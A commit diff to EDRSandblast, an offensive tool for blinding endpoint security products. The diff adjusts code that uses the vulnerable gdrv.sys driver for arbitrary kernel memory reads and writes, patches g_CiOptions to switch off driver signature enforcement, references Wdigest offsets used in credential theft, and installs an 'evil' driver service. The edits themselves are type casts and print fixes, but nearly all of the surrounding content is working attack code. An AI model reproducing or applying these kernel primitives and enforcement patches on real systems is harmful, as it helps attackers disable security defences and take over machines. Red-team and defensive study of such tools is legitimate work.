cosmetic changes & compiler warnings fixes

EDRSandblast/Drivers/DriverGDRV.c

@@ -19,7 +19,7 @@
 #endif
 
 /*
-* "gdrv.sys" (SHA256: xxx)
+* "gdrv.sys" (SHA256: 31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427)
 */
 
 struct GDRV_MEMORY_READ {
@@ -75,8 +75,8 @@ VOID ReadMemoryPrimitive_GDRV(SIZE_T Size, DWORD64 Address, PVOID Buffer) {
     //copy Size bytes from Src to Dest
     struct GDRV_MEMORY_READ ReadCommand = { 0 };
     ReadCommand.Src = Address;
-    ReadCommand.Dst = Buffer;
-    ReadCommand.ReadSize = Size;
+    ReadCommand.Dst = (DWORD64) Buffer;
+    ReadCommand.ReadSize = (DWORD) Size;
 
     DWORD BytesReturned=0;
     DeviceIoControl(GetDriverHandle_GDRV(),
@@ -104,9 +104,9 @@ VOID WriteMemoryPrimitive_GDRV(SIZE_T Size, DWORD64 Address, PVOID Buffer) {
     }
     //copy Size bytes from Dest to Src
     struct GDRV_MEMORY_WRITE WriteCommand = { 0 };
-    WriteCommand.Src = Buffer;
+    WriteCommand.Src = (DWORD64) Buffer;
     WriteCommand.Dst = Address;
-    WriteCommand.WriteSize = Size;
+    WriteCommand.WriteSize = (DWORD) Size;
 
     DWORD BytesReturned = 0;
     DeviceIoControl(GetDriverHandle_GDRV(),

EDRSandblast/Includes/CiOffsets.h

@@ -24,7 +24,7 @@ union CiOffsets {
     } st;
 
     // array version (usefull for code factoring)
-    DWORD64 ar[1];
+    DWORD64 ar[_SUPPORTED_CI_OFFSETS_END];
 };
 
 union CiOffsets g_ciOffsets;

EDRSandblast/Includes/KernelDSE.h

@@ -8,4 +8,4 @@
 
 BOOLEAN IsCiEnabled();
 DWORD64  FindCIBaseAddress(BOOL verbose);
-BOOL patch_gCiOptions(PVOID CiVariableAddress, ULONG CiOptionsValue, PULONG OldCiOptionsValue);
+BOOL patch_gCiOptions(DWORD64 CiVariableAddress, ULONG CiOptionsValue, PULONG OldCiOptionsValue);

EDRSandblast/Includes/WdigestOffsets.h

@@ -27,7 +27,7 @@ union WdigestOffsets {
     } st;
 
     // array version (usefull for code factoring)
-    DWORD64 ar[2];
+    DWORD64 ar[_SUPPORTED_WDIGEST_OFFSETS_END];
 };
 
 union WdigestOffsets g_wdigestOffsets;

EDRSandblast/KernellandBypass/KernelDSE.c

@@ -5,6 +5,7 @@
 //#include "ntstatus.h"
 #include "KernelCallbacks.h"
 #include "NtoskrnlOffsets.h"
+#include "PrintFunctions.h"
 #include "KernelMemoryPrimitives.h"
 #include "KernelUtils.h"
 #include "tchar.h"
@@ -19,7 +20,7 @@
 		sizeof(CiInfo),
 		nullptr);
 	if (!NT_SUCCESS(Status))
-		printf("[-] Failed to query code integrity status: %08X\n", Status);
+		printf_or_not("[-] Failed to query code integrity status: %08X\n", Status);
 
 	return (CiInfo.CodeIntegrityOptions &
 		(CODEINTEGRITY_OPTION_ENABLED | CODEINTEGRITY_OPTION_TESTSIGN)) == CODEINTEGRITY_OPTION_ENABLED;
@@ -43,18 +44,19 @@
              if (_tcscmp(driver, L"CI.dll") == 0) {
                  CiBaseAddress = cbFunction - driverOffset;
                  if (verbose)
-                     printf("[+] %s FOUND at %016llx - 0x%llx : 0x%llx\n", driver, cbFunction, driverOffset, CiBaseAddress);
+                     _tprintf_or_not(TEXT("[+] %s FOUND at %016llx - 0x%llx : 0x%llx\n"), driver, cbFunction, driverOffset, CiBaseAddress);
                  return CiBaseAddress;
              }
          }
      }
+     */
      return CiBaseAddress;
  }
 
- BOOL patch_gCiOptions(PVOID CiVariableAddress, ULONG CiOptionsValue, PULONG OldCiOptionsValue) {
-     *OldCiOptionsValue = ReadMemoryDWORD64(CiVariableAddress);
+ BOOL patch_gCiOptions(DWORD64 CiVariableAddress, ULONG CiOptionsValue, PULONG OldCiOptionsValue) {
+     *OldCiOptionsValue = ReadMemoryDWORD(CiVariableAddress);
      //printf("[+KERNELDSE] The value of gCI at 0x%llx is 0x%x.\n", CiVariableAddress, *OldCiOptionsValue);
-     WriteMemoryDWORD64(CiVariableAddress, CiOptionsValue);
+     WriteMemoryDWORD(CiVariableAddress, CiOptionsValue);
      //printf("[+KERNELDSE] New value of gCI at 0x%llx is 0x%x.\n", CiVariableAddress, ReadMemoryDWORD64(CiVariableAddress));
      return TRUE;
  }

EDRSandblast/Utils/DriverOps.c

@@ -151,7 +151,7 @@ BOOL InstallEvilDriver(TCHAR* driverPath) {
     if (status == 0x00000005) {
         _putts_or_not(TEXT("[!] 0x00000005 - Access Denied when attempting to install the driver - Did you run as administrator?"));
     }
-    _tprintf_or_not(TEXT("[!] The evil service should be manually deleted when you are done with it : \ncmd /c sc stop %s\ncmd /c sc delete %s\n"), GetEvilDriverServiceName());
+    _tprintf_or_not(TEXT("[!] The evil service should be manually deleted when you are done with it: \ncmd /c sc stop %s\ncmd /c sc delete %s\n"), GetEvilDriverServiceName(), GetEvilDriverServiceName());
 
     return status == 0x0;
 }